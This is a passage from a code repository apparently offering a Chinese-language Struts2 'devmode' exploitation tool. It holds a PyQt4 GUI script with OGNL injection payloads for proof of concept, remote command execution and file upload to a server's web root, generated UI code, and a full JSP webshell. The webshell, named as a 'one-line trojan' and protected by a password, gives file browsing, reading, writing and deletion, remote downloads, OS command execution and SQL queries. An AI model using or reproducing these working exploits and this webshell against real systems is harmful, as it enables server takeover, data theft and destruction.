"?debug=browser&object=(%23mem=%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=Go!St2" 22 | target_url = (self.address + payload) 23 | #print(target_url) 24 | try: 25 | req = urllib.request.Request(target_url, method = "GET") 26 | response = urllib.request.urlopen(req) 27 | if response: 28 | data = response.read() 29 | data = str(data, encoding = "utf-8") 30 | self.ui.textBrowser.setText("测试结果:\n%s" %(data)) #将结果输出至textBrowser 31 | except Exception as e: 32 | self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e)) 33 | 34 | def cmd(self): 35 | self.command = str(self.ui.command.text()) 36 | payload= "?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context[%23parameters.rpsobj[0]].getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()))):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789&command=" 37 | target_url = (self.address + payload + self.command) 38 | #print(target_url) 39 | try: 40 | req = urllib.request.Request(target_url, method = "GET") 41 | response = urllib.request.urlopen(req) 42 | data = response.read() 43 | data = str(data, encoding = "utf-8") 44 | self.ui.textBrowser.setText("%s命令执行结果:\n%s" %(self.command, data.rstrip())) #将结果输出至textBrowser 45 | except Exception as e: 46 | self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e)) 47 | 48 | def Go(self): 49 | self.address = str(self.ui.lineEdit.text()) 50 | if self.address: 51 | if self.address.find('://') == -1: 52 | self.address = 'http://' + self.address 53 | if self.ui.comboBox.currentIndex() == 0: 54 | self.PoC() 55 | if self.ui.comboBox.currentIndex() == 1: 56 | self.cmd() 57 | elif self.ui.comboBox.currentIndex() == 2: 58 | self.upload() 59 | 60 | def file_dialog(self): 61 | fd = QtGui.QFileDialog(self) 62 | self.file = fd.getOpenFileName() 63 | from os.path import isfile 64 | if isfile(self.file): 65 | import codecs 66 | text = codecs.open(self.file, "r", "utf-8").read() #弹出文件选择对话框 67 | self.filename = str(self.ui.filename.text()) 68 | 69 | def upload(self): 70 | get_path = "?debug=browser&object=(%23mem=%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS),%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23parameters.content[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=111&content=" 71 | target_url = (self.address + get_path) 72 | try: 73 | req = urllib.request.Request(target_url, method = "GET") 74 | response = urllib.request.urlopen(req) 75 | if response: 76 | data = response.read() 77 | data = str(data, encoding = "utf-8") 78 | except Exception as e: 79 | self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e)) 80 | data = data.strip() 81 | #print(data) 82 | shellpath = data 83 | content = (open(self.file, "r").read()) 84 | #print(content) 85 | temp = "&reqobj=%s&reqobj=%s&content=%s" %(shellpath + "/" + self.filename, shellpath + "/" + self.filename, content) 86 | #print(temp) 87 | payload = "?debug=browser&object=(%23mem=%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS),%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23parameters.reqobj[1],%23fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23parameters.reqobj[2]),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&" 88 | target_url = (self.address + payload + temp) 89 | #print(target_url) 90 | try: 91 | #print(target_url) 92 | req = requests.get(target_url) 93 | data = req.content 94 | #print(data) 95 | data = str(data, encoding = "utf-8") 96 | self.ui.textBrowser.setText("上传成功,文件路径是:\n%s" %(shellpath + "/" + self.filename)) #将结果输出至textBrowser 97 | except Exception as e: 98 | self.ui.textBrowser.setText("出现错误,错误回显为:%s" %(e)) 99 | 100 | def mode(self): 101 | self.ui.comboBox.currentIndex() 102 | 103 | 104 | 105 | if __name__ == "__main__": 106 | app = QtGui.QApplication(sys.argv) 107 | myapp = StartQt4() 108 | myapp.show() 109 | sys.exit(app.exec_()) 110 | -------------------------------------------------------------------------------- /S2-devmode漏洞利用工具(Python 3)/s2devmode.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Form implementation generated from reading ui file 's2devmode.ui' 4 | # 5 | # Created by: PyQt4 UI code generator 4.11.4 6 | # 7 | # WARNING! All changes made in this file will be lost! 8 | 9 | from PyQt4 import QtCore, QtGui 10 | 11 | try: 12 | _fromUtf8 = QtCore.QString.fromUtf8 13 | except AttributeError: 14 | def _fromUtf8(s): 15 | return s 16 | 17 | try: 18 | _encoding = QtGui.QApplication.UnicodeUTF8 19 | def _translate(context, text, disambig): 20 | return QtGui.QApplication.translate(context, text, disambig, _encoding) 21 | except AttributeError: 22 | def _translate(context, text, disambig): 23 | return QtGui.QApplication.translate(context, text, disambig) 24 | 25 | class Ui_MainWindow(object): 26 | def setupUi(self, MainWindow): 27 | MainWindow.setObjectName(_fromUtf8("MainWindow")) 28 | MainWindow.resize(866, 402) 29 | font = QtGui.QFont() 30 | font.setFamily(_fromUtf8("宋体")) 31 | font.setPointSize(10) 32 | font.setBold(True) 33 | font.setWeight(75) 34 | MainWindow.setFont(font) 35 | self.centralwidget = QtGui.QWidget(MainWindow) 36 | self.centralwidget.setObjectName(_fromUtf8("centralwidget")) 37 | self.lineEdit = QtGui.QLineEdit(self.centralwidget) 38 | self.lineEdit.setGeometry(QtCore.QRect(20, 20, 721, 31)) 39 | self.lineEdit.setObjectName(_fromUtf8("lineEdit")) 40 | self.pushButton = QtGui.QPushButton(self.centralwidget) 41 | self.pushButton.setGeometry(QtCore.QRect(760, 20, 71, 31)) 42 | self.pushButton.setObjectName(_fromUtf8("pushButton")) 43 | self.textBrowser = QtGui.QTextBrowser(self.centralwidget) 44 | self.textBrowser.setGeometry(QtCore.QRect(20, 120, 811, 221)) 45 | font = QtGui.QFont() 46 | font.setFamily(_fromUtf8("宋体")) 47 | self.textBrowser.setFont(font) 48 | self.textBrowser.setObjectName(_fromUtf8("textBrowser")) 49 | self.comboBox = QtGui.QComboBox(self.centralwidget) 50 | self.comboBox.setGeometry(QtCore.QRect(130, 70, 101, 31)) 51 | self.comboBox.setObjectName(_fromUtf8("comboBox")) 52 | self.comboBox.addItem(_fromUtf8("")) 53 | self.comboBox.addItem(_fromUtf8("")) 54 | self.comboBox.addItem(_fromUtf8("")) 55 | self.filename = QtGui.QLineEdit(self.centralwidget) 56 | self.filename.setGeometry(QtCore.QRect(580, 70, 131, 31)) 57 | self.filename.setObjectName(_fromUtf8("filename")) 58 | self.label = QtGui.QLabel(self.centralwidget) 59 | self.label.setGeometry(QtCore.QRect(460, 70, 101, 31)) 60 | font = QtGui.QFont() 61 | font.setFamily(_fromUtf8("宋体")) 62 | font.setPointSize(10) 63 | font.setBold(True) 64 | font.setWeight(75) 65 | self.label.setFont(font) 66 | self.label.setObjectName(_fromUtf8("label")) 67 | self.pushButton_2 = QtGui.QPushButton(self.centralwidget) 68 | self.pushButton_2.setGeometry(QtCore.QRect(720, 70, 111, 31)) 69 | self.pushButton_2.setObjectName(_fromUtf8("pushButton_2")) 70 | self.label_2 = QtGui.QLabel(self.centralwidget) 71 | self.label_2.setGeometry(QtCore.QRect(20, 70, 101, 31)) 72 | font = QtGui.QFont() 73 | font.setFamily(_fromUtf8("宋体")) 74 | font.setPointSize(10) 75 | font.setBold(True) 76 | font.setWeight(75) 77 | self.label_2.setFont(font) 78 | self.label_2.setObjectName(_fromUtf8("label_2")) 79 | self.label_3 = QtGui.QLabel(self.centralwidget) 80 | self.label_3.setGeometry(QtCore.QRect(260, 70, 61, 31)) 81 | self.label_3.setObjectName(_fromUtf8("label_3")) 82 | self.command = QtGui.QLineEdit(self.centralwidget) 83 | self.command.setGeometry(QtCore.QRect(330, 70, 111, 31)) 84 | self.command.setObjectName(_fromUtf8("command")) 85 | MainWindow.setCentralWidget(self.centralwidget) 86 | self.menubar = QtGui.QMenuBar(MainWindow) 87 | self.menubar.setGeometry(QtCore.QRect(0, 0, 866, 26)) 88 | self.menubar.setObjectName(_fromUtf8("menubar")) 89 | MainWindow.setMenuBar(self.menubar) 90 | self.statusbar = QtGui.QStatusBar(MainWindow) 91 | self.statusbar.setObjectName(_fromUtf8("statusbar")) 92 | MainWindow.setStatusBar(self.statusbar) 93 | 94 | self.retranslateUi(MainWindow) 95 | QtCore.QMetaObject.connectSlotsByName(MainWindow) 96 | 97 | def retranslateUi(self, MainWindow): 98 | MainWindow.setWindowTitle(_translate("MainWindow", "S2-devmode漏洞利用工具 Coder: crown prince", None)) 99 | self.pushButton.setText(_translate("MainWindow", "Go", None)) 100 | self.comboBox.setItemText(0, _translate("MainWindow", "PoC", None)) 101 | self.comboBox.setItemText(1, _translate("MainWindow", "执行命令", None)) 102 | self.comboBox.setItemText(2, _translate("MainWindow", "文件上传", None)) 103 | self.label.setText(_translate("MainWindow", "上传文件名:", None)) 104 | self.pushButton_2.setText(_translate("MainWindow", " 选择文件:", None)) 105 | self.label_2.setText(_translate("MainWindow", " 模式选择:", None)) 106 | self.label_3.setText(_translate("MainWindow", "命令:", None)) 107 | 108 | -------------------------------------------------------------------------------- /S2-devmode漏洞利用工具(Python 3)/手工测试.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-devmode漏洞利用工具(Python 3)/手工测试.png -------------------------------------------------------------------------------- /S2-devmode漏洞利用工具(Python 3)/手工测试2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-devmode漏洞利用工具(Python 3)/手工测试2.png -------------------------------------------------------------------------------- /S2-devmode漏洞利用工具(Python 3)/执行命令.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-devmode漏洞利用工具(Python 3)/执行命令.png -------------------------------------------------------------------------------- /S2-devmode漏洞利用工具(Python 3)/执行命令2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-devmode漏洞利用工具(Python 3)/执行命令2.png -------------------------------------------------------------------------------- /S2-devmode漏洞利用工具(Python 3)/文件上传1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-devmode漏洞利用工具(Python 3)/文件上传1.png -------------------------------------------------------------------------------- /S2-devmode漏洞利用工具(Python 3)/文件上传1验证.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-devmode漏洞利用工具(Python 3)/文件上传1验证.png -------------------------------------------------------------------------------- /S2-devmode漏洞利用工具(Python 3)/文件上传2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-devmode漏洞利用工具(Python 3)/文件上传2.png -------------------------------------------------------------------------------- /S2-devmode漏洞利用工具(Python 3)/文件上传2验证.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-devmode漏洞利用工具(Python 3)/文件上传2验证.png -------------------------------------------------------------------------------- /S2-devmode漏洞利用工具(Python 3)/站点2-执行命令.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-devmode漏洞利用工具(Python 3)/站点2-执行命令.png -------------------------------------------------------------------------------- /S2-devmode漏洞利用工具(Python 3)/编写参考.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/S2-devmode漏洞利用工具(Python 3)/编写参考.txt -------------------------------------------------------------------------------- /Strust2漏洞 EXP代码.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crown-prince/Go_Struts2/af75e50de69627eeab0bff5fc7a0d124f311ffb1/Strust2漏洞 EXP代码.txt -------------------------------------------------------------------------------- /一句话木马(工具中可能使用).jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> 2 | <%!String Pwd = "tz"; 3 | 4 | String EC(String s, String c) throws Exception { 5 | return s; 6 | }//new String(s.getBytes("ISO-8859-1"),c);} 7 | 8 | Connection GC(String s) throws Exception { 9 | String[] x = s.trim().split("\r\n"); 10 | Class.forName(x[0].trim()).newInstance(); 11 | Connection c = DriverManager.getConnection(x[1].trim()); 12 | if (x.length > 2) { 13 | c.setCatalog(x[2].trim()); 14 | } 15 | return c; 16 | } 17 | 18 | void AA(StringBuffer sb) throws Exception { 19 | File r[] = File.listRoots(); 20 | for (int i = 0; i < r.length; i++) { 21 | sb.append(r[i].toString().substring(0, 2)); 22 | } 23 | } 24 | 25 | void BB(String s, StringBuffer sb) throws Exception { 26 | File oF = new File(s), l[] = oF.listFiles(); 27 | String sT, sQ, sF = ""; 28 | java.util.Date dt; 29 | SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); 30 | for (int i = 0; i < l.length; i++) { 31 | dt = new java.util.Date(l[i].lastModified()); 32 | sT = fm.format(dt); 33 | sQ = l[i].canRead() ? "R" : ""; 34 | sQ += l[i].canWrite() ? " W" : ""; 35 | if (l[i].isDirectory()) { 36 | sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length() 37 | + "\t" + sQ + "\n"); 38 | } else { 39 | sF += l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t" 40 | + sQ + "\n"; 41 | } 42 | } 43 | sb.append(sF); 44 | } 45 | 46 | void EE(String s) throws Exception { 47 | File f = new File(s); 48 | if (f.isDirectory()) { 49 | File x[] = f.listFiles(); 50 | for (int k = 0; k < x.length; k++) { 51 | if (!x[k].delete()) { 52 | EE(x[k].getPath()); 53 | } 54 | } 55 | } 56 | f.delete(); 57 | } 58 | 59 | void FF(String s, HttpServletResponse r) throws Exception { 60 | int n; 61 | byte[] b = new byte[512]; 62 | r.reset(); 63 | ServletOutputStream os = r.getOutputStream(); 64 | BufferedInputStream is = new BufferedInputStream(new FileInputStream(s)); 65 | os.write(("->" + "|").getBytes(), 0, 3); 66 | while ((n = is.read(b, 0, 512)) != -1) { 67 | os.write(b, 0, n); 68 | } 69 | os.write(("|" + "<-").getBytes(), 0, 3); 70 | os.close(); 71 | is.close(); 72 | } 73 | 74 | void GG(String s, String d) throws Exception { 75 | String h = "0123456789ABCDEF"; 76 | int n; 77 | File f = new File(s); 78 | f.createNewFile(); 79 | FileOutputStream os = new FileOutputStream(f); 80 | for (int i = 0; i < d.length(); i += 2) { 81 | os 82 | .write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d 83 | .charAt(i + 1)))); 84 | } 85 | os.close(); 86 | } 87 | 88 | void HH(String s, String d) throws Exception { 89 | File sf = new File(s), df = new File(d); 90 | if (sf.isDirectory()) { 91 | if (!df.exists()) { 92 | df.mkdir(); 93 | } 94 | File z[] = sf.listFiles(); 95 | for (int j = 0; j < z.length; j++) { 96 | HH(s + "/" + z[j].getName(), d + "/" + z[j].getName()); 97 | } 98 | } else { 99 | FileInputStream is = new FileInputStream(sf); 100 | FileOutputStream os = new FileOutputStream(df); 101 | int n; 102 | byte[] b = new byte[512]; 103 | while ((n = is.read(b, 0, 512)) != -1) { 104 | os.write(b, 0, n); 105 | } 106 | is.close(); 107 | os.close(); 108 | } 109 | } 110 | 111 | void II(String s, String d) throws Exception { 112 | File sf = new File(s), df = new File(d); 113 | sf.renameTo(df); 114 | } 115 | 116 | void JJ(String s) throws Exception { 117 | File f = new File(s); 118 | f.mkdir(); 119 | } 120 | 121 | void KK(String s, String t) throws Exception { 122 | File f = new File(s); 123 | SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); 124 | java.util.Date dt = fm.parse(t); 125 | f.setLastModified(dt.getTime()); 126 | } 127 | 128 | void LL(String s, String d) throws Exception { 129 | URL u = new URL(s); 130 | int n; 131 | FileOutputStream os = new FileOutputStream(d); 132 | HttpURLConnection h = (HttpURLConnection) u.openConnection(); 133 | InputStream is = h.getInputStream(); 134 | byte[] b = new byte[512]; 135 | while ((n = is.read(b, 0, 512)) != -1) { 136 | os.write(b, 0, n); 137 | } 138 | os.close(); 139 | is.close(); 140 | h.disconnect(); 141 | } 142 | 143 | void MM(InputStream is, StringBuffer sb) throws Exception { 144 | String l; 145 | BufferedReader br = new BufferedReader(new InputStreamReader(is)); 146 | while ((l = br.readLine()) != null) { 147 | sb.append(l + "\r\n"); 148 | } 149 | } 150 | 151 | void NN(String s, StringBuffer sb) throws Exception { 152 | Connection c = GC(s); 153 | ResultSet r = c.getMetaData().getCatalogs(); 154 | while (r.next()) { 155 | sb.append(r.getString(1) + "\t"); 156 | } 157 | r.close(); 158 | c.close(); 159 | } 160 | 161 | void OO(String s, StringBuffer sb) throws Exception { 162 | Connection c = GC(s); 163 | String[] t = { "TABLE" }; 164 | ResultSet r = c.getMetaData().getTables(null, null, "%", t); 165 | while (r.next()) { 166 | sb.append(r.getString("TABLE_NAME") + "\t"); 167 | } 168 | r.close(); 169 | c.close(); 170 | } 171 | 172 | void PP(String s, StringBuffer sb) throws Exception { 173 | String[] x = s.trim().split("\r\n"); 174 | Connection c = GC(s); 175 | Statement m = c.createStatement(1005, 1007); 176 | ResultSet r = m.executeQuery("select * from " + x[3]); 177 | ResultSetMetaData d = r.getMetaData(); 178 | for (int i = 1; i <= d.getColumnCount(); i++) { 179 | sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i) 180 | + ")\t"); 181 | } 182 | r.close(); 183 | m.close(); 184 | c.close(); 185 | } 186 | 187 | void QQ(String cs, String s, String q, StringBuffer sb) throws Exception { 188 | int i; 189 | Connection c = GC(s); 190 | Statement m = c.createStatement(1005, 1008); 191 | try { 192 | ResultSet r = m.executeQuery(q); 193 | ResultSetMetaData d = r.getMetaData(); 194 | int n = d.getColumnCount(); 195 | for (i = 1; i <= n; i++) { 196 | sb.append(d.getColumnName(i) + "\t|\t"); 197 | } 198 | sb.append("\r\n"); 199 | while (r.next()) { 200 | for (i = 1; i <= n; i++) { 201 | sb.append(EC(r.getString(i), cs) + "\t|\t"); 202 | } 203 | sb.append("\r\n"); 204 | } 205 | r.close(); 206 | } catch (Exception e) { 207 | sb.append("Result\t|\t\r\n"); 208 | try { 209 | m.executeUpdate(q); 210 | sb.append("Execute Successfully!\t|\t\r\n"); 211 | } catch (Exception ee) { 212 | sb.append(ee.toString() + "\t|\t\r\n"); 213 | } 214 | } 215 | m.close(); 216 | c.close(); 217 | }%> 218 | 219 | 220 | <% 221 | String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z0") + ""; 222 | request.setCharacterEncoding(cs); 223 | response.setContentType("text/html;charset=" + cs); 224 | String Z = EC(request.getParameter(Pwd) + "", cs); 225 | String z1 = EC(request.getParameter("z1") + "", cs); 226 | String z2 = EC(request.getParameter("z2") + "", cs); 227 | StringBuffer sb = new StringBuffer(""); 228 | try { 229 | sb.append("->" + "|"); 230 | if (Z.equals("A")) { 231 | String s = new File(application.getRealPath(request 232 | .getRequestURI())).getParent(); 233 | sb.append(s + "\t"); 234 | if (!s.substring(0, 1).equals("/")) { 235 | AA(sb); 236 | } 237 | } else if (Z.equals("B")) { 238 | BB(z1, sb); 239 | } else if (Z.equals("C")) { 240 | String l = ""; 241 | BufferedReader br = new BufferedReader( 242 | new InputStreamReader(new FileInputStream(new File( 243 | z1)))); 244 | while ((l = br.readLine()) != null) { 245 | sb.append(l + "\r\n"); 246 | } 247 | br.close(); 248 | } else if (Z.equals("D")) { 249 | BufferedWriter bw = new BufferedWriter( 250 | new OutputStreamWriter(new FileOutputStream( 251 | new File(z1)))); 252 | bw.write(z2); 253 | bw.close(); 254 | sb.append("1"); 255 | } else if (Z.equals("E")) { 256 | EE(z1); 257 | sb.append("1"); 258 | } else if (Z.equals("F")) { 259 | FF(z1, response); 260 | } else if (Z.equals("G")) { 261 | GG(z1, z2); 262 | sb.append("1"); 263 | } else if (Z.equals("H")) { 264 | HH(z1, z2); 265 | sb.append("1"); 266 | } else if (Z.equals("I")) { 267 | II(z1, z2); 268 | sb.append("1"); 269 | } else if (Z.equals("J")) { 270 | JJ(z1); 271 | sb.append("1"); 272 | } else if (Z.equals("K")) { 273 | KK(z1, z2); 274 | sb.append("1"); 275 | } else if (Z.equals("L")) { 276 | LL(z1, z2); 277 | sb.append("1"); 278 | } else if (Z.equals("M")) { 279 | String[] c = { z1.substring(2), z1.substring(0, 2), z2 }; 280 | Process p = Runtime.getRuntime().exec(c); 281 | MM(p.getInputStream(), sb); 282 | MM(p.getErrorStream(), sb); 283 | } else if (Z.equals("N")) { 284 | NN(z1, sb); 285 | } else if (Z.equals("O")) { 286 | OO(z1, sb); 287 | } else if (Z.equals("P")) { 288 | PP(z1, sb); 289 | } else if (Z.equals("Q")) { 290 | QQ(cs, z1, z2, sb); 291 | } 292 | } catch (Exception e) { 293 | sb.append("ERROR" + ":// " + e.toString()); 294 | } 295 | sb.append("|" + "<-"); 296 | out.print(sb.toString()); 297 | %> 298 | --------------------------------------------------------------------------------